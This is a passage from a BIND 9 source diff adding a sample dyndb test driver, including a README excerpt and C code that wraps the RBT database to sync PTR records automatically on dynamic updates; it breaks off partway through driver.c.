+ +The driver wraps the RBT database implementation used natively by BIND, +and modifies the addrdataset() and substractrdataset() functions to do +additional work during dynamic updates. + +A dynamic update modifies the target zone as usual. After that, the +driver detects whether the modified RR was of type A or AAAA, and if so, +attempts to appropriately generate or delete a matching PTR record in +one of the two zones managed by the driver. + +E.g.: + +$ nsupdate +> update add a.test. 300 IN A 192.0.2.1 +> send + +will add the A record +a.test. 300 IN A 192.0.2.1 + +and also automatically generate the PTR record +1.2.0.192.in-addr.arpa. 300 IN PTR a.test. + +AXFR and RR deletion via dynamic updates should work as usual. Deletion +of a type A or AAAA record should delete the corresponding PTR record +too. + +The zone is stored only in memory, and all changes will be lost on +reload/reconfig. + +Hints for code readers: +- Driver initialization starts in driver.c: dyndb_init() function. +- New database implementation is registered by calling dns_db_register() + and passing a function pointer to it. This sample uses the function + create_db() to initialize the database. +- Zones are created later in instance.c: load_sample_instance_zones(). +- Database entry points are in structure db.c: dns_dbmethods_t + sampledb_methods +- sampledb_methods points to an implementation of the database interface. + See the db.c: addrdataset() implementation and look at how the RBT + database instance is wrapped into an additional layer of logic. diff --git a/bin/tests/system/dyndb/driver/db.c b/bin/tests/system/dyndb/driver/db.c new file mode 100644 index 0000000..bed7d3e --- /dev/null +++ b/bin/tests/system/dyndb/driver/db.c 
@@ -0,0 +1,814 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) 2009-2015 Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +/* + * Database API implementation. The interface is defined in lib/dns/db.h. + * + * dns_db_*() calls on database instances backed by this driver use + * struct sampledb_methods to find appropriate function implementation. + * + * This example re-uses RBT DB implementation from original BIND and blindly + * proxies most of dns_db_*() calls to this underlying RBT DB. + * See struct sampledb below. 
+ */ + +#include "db.h" +#include <inttypes.h> +#include <stdbool.h> + +#include <isc/string.h> +#include <isc/util.h> + +#include <dns/db.h> +#include <dns/diff.h> +#include <dns/enumclass.h> +#include <dns/rbt.h> +#include <dns/rdatalist.h> +#include <dns/rdatastruct.h> +#include <dns/soa.h> +#include <dns/types.h> + +#include "instance.h" +#include "syncptr.h" +#include "util.h" + +#define SAMPLEDB_MAGIC ISC_MAGIC('S', 'M', 'D', 'B') +#define VALID_SAMPLEDB(sampledb) \ + ((sampledb) != NULL && (sampledb)->common.impmagic == SAMPLEDB_MAGIC) + +struct sampledb { + dns_db_t common; + isc_refcount_t refs; + sample_instance_t *inst; + + /* + * Internal RBT database implementation provided by BIND. + * Most dns_db_* calls (find(), createiterator(), etc.) + * are blindly forwarded to this RBT DB. + */ + dns_db_t *rbtdb; +}; + +typedef struct sampledb sampledb_t; + +/* + * Get full DNS name from the node. + * + * @warning + * The code silently expects that "node" came from RBTDB and thus + * assumption dns_dbnode_t (from RBTDB) == dns_rbtnode_t is correct. + * + * This should work as long as we use only RBTDB and nothing else. 
+ */ +static isc_result_t +sample_name_fromnode(dns_dbnode_t *node, dns_name_t *name) { + dns_rbtnode_t *rbtnode = (dns_rbtnode_t *)node; + return (dns_rbt_fullnamefromnode(rbtnode, name)); +} + +static void +attach(dns_db_t *source, dns_db_t **targetp) { + sampledb_t *sampledb = (sampledb_t *)source; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + isc_refcount_increment(&sampledb->refs); + *targetp = source; +} + +static void +free_sampledb(sampledb_t *sampledb) { + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_detach(&sampledb->rbtdb); + dns_name_free(&sampledb->common.origin, sampledb->common.mctx); + isc_mem_putanddetach(&sampledb->common.mctx, sampledb, + sizeof(*sampledb)); +} + +static void +detach(dns_db_t **dbp) { + REQUIRE(dbp != NULL && VALID_SAMPLEDB((sampledb_t *)(*dbp))); + sampledb_t *sampledb = (sampledb_t *)(*dbp); + *dbp = NULL; + + if (isc_refcount_decrement(&sampledb->refs) == 1) { + free_sampledb(sampledb); + } +} + +/* + * This method should never be called, because DB is "persistent". + * See ispersistent() function. It means that database do not need to be + * loaded in the usual sense. + */ +static isc_result_t +beginload(dns_db_t *db, dns_rdatacallbacks_t *callbacks) { + UNUSED(db); + UNUSED(callbacks); + + fatal_error("current implementation should never call beginload()"); + + /* Not reached */ + return (ISC_R_SUCCESS); +} + +/* + * This method should never be called, because DB is "persistent". + * See ispersistent() function. It means that database do not need to be + * loaded in the usual sense. 
+ */ +static isc_result_t +endload(dns_db_t *db, dns_rdatacallbacks_t *callbacks) { + UNUSED(db); + UNUSED(callbacks); + + fatal_error("current implementation should never call endload()"); + + /* Not reached */ + return (ISC_R_SUCCESS); +} + +static isc_result_t +serialize(dns_db_t *db, dns_dbversion_t *version, FILE *file) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_serialize(sampledb->rbtdb, version, file)); +} + +static isc_result_t +dump(dns_db_t *db, dns_dbversion_t *version, const char *filename, + dns_masterformat_t masterformat) { + UNUSED(db); + UNUSED(version); + UNUSED(filename); + UNUSED(masterformat); + + fatal_error("current implementation should never call dump()"); + + /* Not reached */ + return (ISC_R_SUCCESS); +} + +static void +currentversion(dns_db_t *db, dns_dbversion_t **versionp) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_currentversion(sampledb->rbtdb, versionp); +} + +static isc_result_t +newversion(dns_db_t *db, dns_dbversion_t **versionp) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_newversion(sampledb->rbtdb, versionp)); +} + +static void +attachversion(dns_db_t *db, dns_dbversion_t *source, + dns_dbversion_t **targetp) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_attachversion(sampledb->rbtdb, source, targetp); +} + +static void +closeversion(dns_db_t *db, dns_dbversion_t **versionp, bool commit) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_closeversion(sampledb->rbtdb, versionp, commit); +} + +static isc_result_t +findnode(dns_db_t *db, const dns_name_t *name, bool create, + dns_dbnode_t **nodep) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_findnode(sampledb->rbtdb, name, create, nodep)); +} + +static isc_result_t 
+find(dns_db_t *db, const dns_name_t *name, dns_dbversion_t *version, + dns_rdatatype_t type, unsigned int options, isc_stdtime_t now, + dns_dbnode_t **nodep, dns_name_t *foundname, dns_rdataset_t *rdataset, + dns_rdataset_t *sigrdataset) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_find(sampledb->rbtdb, name, version, type, options, now, + nodep, foundname, rdataset, sigrdataset)); +} + +static isc_result_t +findzonecut(dns_db_t *db, const dns_name_t *name, unsigned int options, + isc_stdtime_t now, dns_dbnode_t **nodep, dns_name_t *foundname, + dns_name_t *dcname, dns_rdataset_t *rdataset, + dns_rdataset_t *sigrdataset) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_findzonecut(sampledb->rbtdb, name, options, now, nodep, + foundname, dcname, rdataset, sigrdataset)); +} + +static void +attachnode(dns_db_t *db, dns_dbnode_t *source, dns_dbnode_t **targetp) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_attachnode(sampledb->rbtdb, source, targetp); +} + +static void +detachnode(dns_db_t *db, dns_dbnode_t **targetp) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_detachnode(sampledb->rbtdb, targetp); +} + +static isc_result_t +expirenode(dns_db_t *db, dns_dbnode_t *node, isc_stdtime_t now) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_expirenode(sampledb->rbtdb, node, now)); +} + +static void +printnode(dns_db_t *db, dns_dbnode_t *node, FILE *out) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_printnode(sampledb->rbtdb, node, out); +} + +static isc_result_t +createiterator(dns_db_t *db, unsigned int options, + dns_dbiterator_t **iteratorp) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return 
(dns_db_createiterator(sampledb->rbtdb, options, iteratorp)); +} + +static isc_result_t +findrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version, + dns_rdatatype_t type, dns_rdatatype_t covers, isc_stdtime_t now, + dns_rdataset_t *rdataset, dns_rdataset_t *sigrdataset) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_findrdataset(sampledb->rbtdb, node, version, type, + covers, now, rdataset, sigrdataset)); +} + +static isc_result_t +allrdatasets(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version, + unsigned int options, isc_stdtime_t now, + dns_rdatasetiter_t **iteratorp) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_allrdatasets(sampledb->rbtdb, node, version, options, + now, iteratorp)); +} + +static isc_result_t +addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version, + isc_stdtime_t now, dns_rdataset_t *rdataset, unsigned int options, + dns_rdataset_t *addedrdataset) { + sampledb_t *sampledb = (sampledb_t *)db; + isc_result_t result; + dns_fixedname_t name; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_fixedname_init(&name); + CHECK(dns_db_addrdataset(sampledb->rbtdb, node, version, now, rdataset, + options, addedrdataset)); + if (rdataset->type == dns_rdatatype_a || + rdataset->type == dns_rdatatype_aaaa) + { + CHECK(sample_name_fromnode(node, dns_fixedname_name(&name))); + CHECK(syncptrs(sampledb->inst, dns_fixedname_name(&name), + rdataset, DNS_DIFFOP_ADD)); + } + +cleanup: + return (result); +} + +static isc_result_t +subtractrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version, + dns_rdataset_t *rdataset, unsigned int options, + dns_rdataset_t *newrdataset) { + sampledb_t *sampledb = (sampledb_t *)db; + isc_result_t result; + dns_fixedname_t name; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_fixedname_init(&name); + result = dns_db_subtractrdataset(sampledb->rbtdb, node, version, + 
rdataset, options, newrdataset); + if (result != ISC_R_SUCCESS && result != DNS_R_NXRRSET) { + goto cleanup; + } + + if (rdataset->type == dns_rdatatype_a || + rdataset->type == dns_rdatatype_aaaa) + { + CHECK(sample_name_fromnode(node, dns_fixedname_name(&name))); + CHECK(syncptrs(sampledb->inst, dns_fixedname_name(&name), + rdataset, DNS_DIFFOP_DEL)); + } + +cleanup: + return (result); +} + +/* + * deleterdataset() function is not used during DNS update processing so syncptr + * implementation is left as an exercise to the reader. + */ +static isc_result_t +deleterdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version, + dns_rdatatype_t type, dns_rdatatype_t covers) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_deleterdataset(sampledb->rbtdb, node, version, type, + covers)); +} + +static bool +issecure(dns_db_t *db) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_issecure(sampledb->rbtdb)); +} + +static unsigned int +nodecount(dns_db_t *db) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_nodecount(sampledb->rbtdb)); +} + +/* + * The database does not need to be loaded from disk or written to disk. + * Always return true. 
+ */ +static bool +ispersistent(dns_db_t *db) { + UNUSED(db); + + return (true); +} + +static void +overmem(dns_db_t *db, bool over) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_overmem(sampledb->rbtdb, over); +} + +static void +settask(dns_db_t *db, isc_task_t *task) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_settask(sampledb->rbtdb, task); +} + +static isc_result_t +getoriginnode(dns_db_t *db, dns_dbnode_t **nodep) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_getoriginnode(sampledb->rbtdb, nodep)); +} + +static void +transfernode(dns_db_t *db, dns_dbnode_t **sourcep, dns_dbnode_t **targetp) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_transfernode(sampledb->rbtdb, sourcep, targetp); +} + +static isc_result_t +getnsec3parameters(dns_db_t *db, dns_dbversion_t *version, dns_hash_t *hash, + uint8_t *flags, uint16_t *iterations, unsigned char *salt, + size_t *salt_length) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_getnsec3parameters(sampledb->rbtdb, version, hash, flags, + iterations, salt, salt_length)); +} + +static isc_result_t +findnsec3node(dns_db_t *db, const dns_name_t *name, bool create, + dns_dbnode_t **nodep) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_findnsec3node(sampledb->rbtdb, name, create, nodep)); +} + +static isc_result_t +setsigningtime(dns_db_t *db, dns_rdataset_t *rdataset, isc_stdtime_t resign) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_setsigningtime(sampledb->rbtdb, rdataset, resign)); +} + +static isc_result_t +getsigningtime(dns_db_t *db, dns_rdataset_t *rdataset, dns_name_t *name) { + sampledb_t *sampledb = (sampledb_t *)db; + + 
REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_getsigningtime(sampledb->rbtdb, rdataset, name)); +} + +static void +resigned(dns_db_t *db, dns_rdataset_t *rdataset, dns_dbversion_t *version) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_resigned(sampledb->rbtdb, rdataset, version); +} + +static bool +isdnssec(dns_db_t *db) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_isdnssec(sampledb->rbtdb)); +} + +static dns_stats_t * +getrrsetstats(dns_db_t *db) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_getrrsetstats(sampledb->rbtdb)); +} + +static isc_result_t +findnodeext(dns_db_t *db, const dns_name_t *name, bool create, + dns_clientinfomethods_t *methods, dns_clientinfo_t *clientinfo, + dns_dbnode_t **nodep) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_findnodeext(sampledb->rbtdb, name, create, methods, + clientinfo, nodep)); +} + +static isc_result_t +findext(dns_db_t *db, const dns_name_t *name, dns_dbversion_t *version, + dns_rdatatype_t type, unsigned int options, isc_stdtime_t now, + dns_dbnode_t **nodep, dns_name_t *foundname, + dns_clientinfomethods_t *methods, dns_clientinfo_t *clientinfo, + dns_rdataset_t *rdataset, dns_rdataset_t *sigrdataset) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_findext(sampledb->rbtdb, name, version, type, options, + now, nodep, foundname, methods, clientinfo, + rdataset, sigrdataset)); +} + +static isc_result_t +setcachestats(dns_db_t *db, isc_stats_t *stats) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_setcachestats(sampledb->rbtdb, stats)); +} + +static size_t +hashsize(dns_db_t *db) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return 
(dns_db_hashsize(sampledb->rbtdb)); +} + +/* + * DB interface definition. Database driver uses this structure to + * determine which implementation of dns_db_*() function to call. + */ +static dns_dbmethods_t sampledb_methods = { + attach, + detach, + beginload, + endload, + serialize, + dump, + currentversion, + newversion, + attachversion, + closeversion, + findnode, + find, + findzonecut, + attachnode, + detachnode, + expirenode, + printnode, + createiterator, + findrdataset, + allrdatasets, + addrdataset, + subtractrdataset, + deleterdataset, + issecure, + nodecount, + ispersistent, + overmem, + settask, + getoriginnode, + transfernode, + getnsec3parameters, + findnsec3node, + setsigningtime, + getsigningtime, + resigned, + isdnssec, + getrrsetstats, + NULL, /* rpz_attach */ + NULL, /* rpz_ready */ + findnodeext, + findext, + setcachestats, + hashsize, + NULL, /* nodefullname */ + NULL, /* getsize */ + NULL, /* setservestalettl */ + NULL, /* getservestalettl */ + NULL, /* setservestalerefresh */ + NULL, /* getservestalerefresh */ + NULL, /* setgluecachestats */ + NULL /* adjusthashsize */ +}; + +/* Auxiliary driver functions. */ + +/* + * Auxiliary functions add_*() create minimal database which can be loaded. + * This is necessary because this driver create empty 'fake' zone which + * is not loaded from disk so there is no way for user to supply SOA, NS and A + * records. + * + * Following functions were copied from BIND 9.10.2rc1 named/server.c, + * credit goes to ISC. 
+ */ +static isc_result_t +add_soa(dns_db_t *db, dns_dbversion_t *version, const dns_name_t *name, + const dns_name_t *origin, const dns_name_t *contact) { + dns_dbnode_t *node = NULL; + dns_rdata_t rdata = DNS_RDATA_INIT; + dns_rdatalist_t rdatalist; + dns_rdataset_t rdataset; + isc_result_t result; + unsigned char buf[DNS_SOA_BUFFERSIZE]; + + dns_rdataset_init(&rdataset); + dns_rdatalist_init(&rdatalist); + CHECK(dns_soa_buildrdata(origin, contact, dns_db_class(db), 0, 28800, + 7200, 604800, 86400, buf, &rdata)); + rdatalist.type = rdata.type; + rdatalist.covers = 0; + rdatalist.rdclass = rdata.rdclass; + rdatalist.ttl = 86400; + ISC_LIST_APPEND(rdatalist.rdata, &rdata, link); + CHECK(dns_rdatalist_tordataset(&rdatalist, &rdataset)); + CHECK(dns_db_findnode(db, name, true, &node)); + CHECK(dns_db_addrdataset(db, node, version, 0, &rdataset, 0, NULL)); +cleanup: + if (node != NULL) { + dns_db_detachnode(db, &node); + } + return (result); +} + +static isc_result_t +add_ns(dns_db_t *db, dns_dbversion_t *version, const dns_name_t *name, + const dns_name_t *nsname) { + dns_dbnode_t *node = NULL; + dns_rdata_ns_t ns; + dns_rdata_t rdata = DNS_RDATA_INIT; + dns_rdatalist_t rdatalist; + dns_rdataset_t rdataset; + isc_result_t result; + isc_buffer_t b; + unsigned char buf[DNS_NAME_MAXWIRE]; + + isc_buffer_init(&b, buf, sizeof(buf)); + + dns_rdataset_init(&rdataset); + dns_rdatalist_init(&rdatalist); + ns.common.rdtype = dns_rdatatype_ns; + ns.common.rdclass = dns_db_class(db); + ns.mctx = NULL; + dns_name_init(&ns.name, NULL); + dns_name_clone(nsname, &ns.name); + CHECK(dns_rdata_fromstruct(&rdata, dns_db_class(db), dns_rdatatype_ns, + &ns, &b)); + rdatalist.type = rdata.type; + rdatalist.covers = 0; + rdatalist.rdclass = rdata.rdclass; + rdatalist.ttl = 86400; + ISC_LIST_APPEND(rdatalist.rdata, &rdata, link); + CHECK(dns_rdatalist_tordataset(&rdatalist, &rdataset)); + CHECK(dns_db_findnode(db, name, true, &node)); + CHECK(dns_db_addrdataset(db, node, version, 0, 
&rdataset, 0, NULL)); +cleanup: + if (node != NULL) { + dns_db_detachnode(db, &node); + } + return (result); +} + +static isc_result_t +add_a(dns_db_t *db, dns_dbversion_t *version, const dns_name_t *name, + struct in_addr addr) { + dns_dbnode_t *node = NULL; + dns_rdata_in_a_t a; + dns_rdata_t rdata = DNS_RDATA_INIT; + dns_rdatalist_t rdatalist; + dns_rdataset_t rdataset; + isc_result_t result; + isc_buffer_t b; + unsigned char buf[DNS_NAME_MAXWIRE]; + + isc_buffer_init(&b, buf, sizeof(buf)); + + dns_rdataset_init(&rdataset); + dns_rdatalist_init(&rdatalist); + a.common.rdtype = dns_rdatatype_a; + a.common.rdclass = dns_db_class(db); + a.in_addr = addr; + CHECK(dns_rdata_fromstruct(&rdata, dns_db_class(db), dns_rdatatype_a, + &a, &b)); + rdatalist.type = rdata.type; + rdatalist.covers = 0; + rdatalist.rdclass = rdata.rdclass; + rdatalist.ttl = 86400; + ISC_LIST_APPEND(rdatalist.rdata, &rdata, link); + CHECK(dns_rdatalist_tordataset(&rdatalist, &rdataset)); + CHECK(dns_db_findnode(db, name, true, &node)); + CHECK(dns_db_addrdataset(db, node, version, 0, &rdataset, 0, NULL)); +cleanup: + if (node != NULL) { + dns_db_detachnode(db, &node); + } + return (result); +} + +/* + * Driver-specific implementation of dns_db_create(). + * + * @param[in] argv Database-specific parameters from dns_db_create(). + * @param[in] driverarg Driver-specific parameter from dns_db_register(). 
+ */ +isc_result_t +create_db(isc_mem_t *mctx, const dns_name_t *origin, dns_dbtype_t type, + dns_rdataclass_t rdclass, unsigned int argc, char *argv[], + void *driverarg, dns_db_t **dbp) { + sampledb_t *sampledb = NULL; + isc_result_t result; + dns_dbversion_t *version = NULL; + struct in_addr a_addr; + + REQUIRE(type == dns_dbtype_zone); + REQUIRE(rdclass == dns_rdataclass_in); + REQUIRE(argc == 0); + REQUIRE(argv != NULL); + REQUIRE(driverarg != NULL); /* pointer to driver instance */ + REQUIRE(dbp != NULL && *dbp == NULL); + + UNUSED(driverarg); /* no driver-specific configuration */ + + a_addr.s_addr = 0x0100007fU; + + CHECKED_MEM_GET_PTR(mctx, sampledb); + ZERO_PTR(sampledb); + + isc_mem_attach(mctx, &sampledb->common.mctx); + dns_name_init(&sampledb->common.origin, NULL); + + sampledb->common.magic = DNS_DB_MAGIC; + sampledb->common.impmagic = SAMPLEDB_MAGIC; + + sampledb->common.methods = &sampledb_methods; + sampledb->common.attributes = 0; + sampledb->common.rdclass = rdclass; + + CHECK(dns_name_dupwithoffsets(origin, mctx, &sampledb->common.origin)); + + isc_refcount_init(&sampledb->refs, 1); + + /* Translate instance name to instance pointer. */ + sampledb->inst = driverarg; + + /* Create internal instance of RBT DB implementation from BIND. */ + CHECK(dns_db_create(mctx, "rbt", origin, dns_dbtype_zone, + dns_rdataclass_in, 0, NULL, &sampledb->rbtdb)); + + /* Create fake SOA, NS, and A records to make database loadable. 
*/ + CHECK(dns_db_newversion(sampledb->rbtdb, &version)); + CHECK(add_soa(sampledb->rbtdb, version, origin, origin, origin)); + CHECK(add_ns(sampledb->rbtdb, version, origin, origin)); + CHECK(add_a(sampledb->rbtdb, version, origin, a_addr)); + dns_db_closeversion(sampledb->rbtdb, &version, true); + + *dbp = (dns_db_t *)sampledb; + + return (ISC_R_SUCCESS); + +cleanup: + if (sampledb != NULL) { + if (dns_name_dynamic(&sampledb->common.origin)) { + dns_name_free(&sampledb->common.origin, mctx); + } + + isc_mem_putanddetach(&sampledb->common.mctx, sampledb, + sizeof(*sampledb)); + } + + return (result); +} diff --git a/bin/tests/system/dyndb/driver/db.h b/bin/tests/system/dyndb/driver/db.h new file mode 100644 index 0000000..c520c8b --- /dev/null +++ b/bin/tests/system/dyndb/driver/db.h 
@@ -0,0 +1,47 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) 2009-2015 Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +/** + * Database API implementation. + */ + +#pragma once + +#include <isc/mem.h> +#include <isc/result.h> + +#include <dns/db.h> +#include <dns/name.h> +#include <dns/rdataclass.h> +#include <dns/rdatatype.h> + +isc_result_t +create_db(isc_mem_t *mctx, const dns_name_t *origin, dns_dbtype_t type, + dns_rdataclass_t rdclass, unsigned int argc, char *argv[], + void *driverarg, dns_db_t **dbp); diff --git a/bin/tests/system/dyndb/driver/driver.c b/bin/tests/system/dyndb/driver/driver.c new file mode 100644 index 0000000..51bcbd2 --- /dev/null +++ b/bin/tests/system/dyndb/driver/driver.c 
@@ -0,0 +1,179 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +/* + * Driver API implementation and main entry point for BIND. + * + * BIND calls dyndb_version() before loading, dyndb_init() during startup + * and dyndb_destroy() during shutdown. + * + * It is completely up to implementation what to do. + * + * dyndb <name> <driver> {} sections in named.conf are independent so + * driver init() and destroy() functions are called independently for + * each section even if they reference the same driver/library. It is + * up to driver implementation to detect and catch this situation if + * it is undesirable. 
+ */ + +#include <isc/commandline.h> +#include <isc/hash.h> +#include <isc/lib.h> +#include <isc/mem.h> +#include <isc/util.h> + +#include <dns/db.h> +#include <dns/dyndb.h> +#include <dns/lib.h> +#include <dns/types.h> + +#include "db.h" +#include "instance.h" +#include "log.h" +#include "util.h" + +dns_dyndb_destroy_t dyndb_destroy; +dns_dyndb_register_t dyndb_init; +dns_dyndb_version_t dyndb_version; + +/* + * Driver init is called for each dyndb section in named.conf + * once during startup and then again on every reload. + * + * @code + * dyndb example-name "sample.so" { param1 param2 }; + * @endcode + * + * @param[in] name User-defined string from dyndb "name" {}; definition + * in named.conf. + * The example above will have name = "example-name". + * @param[in] parameters User-defined parameters from dyndb section as one + * string. The example above will have + * params = "param1 param2"; + * @param[in] file The name of the file from which the parameters + * were read. + * @param[in] line The line number from which the parameters were read. + * @param[out] instp Pointer to instance-specific data + * (for one dyndb section). + */ +isc_result_t +dyndb_init(isc_mem_t *mctx, const char *name, const char *parameters, + const char *file, unsigned long line, const dns_dyndbctx_t *dctx, + void **instp) { + isc_result_t result; + unsigned int argc; + char **argv = NULL; + char *s = NULL; + sample_instance_t *sample_inst = NULL; + + REQUIRE(name != NULL); + REQUIRE(dctx != NULL); + + /* + * Depending on how dlopen() was called, we may not have + * access to named's global namespace, in which case we need + * to initialize libisc/libdns. We check this by comparing + * the value of isc_mem_debugging to the value passed via + * the context object. 
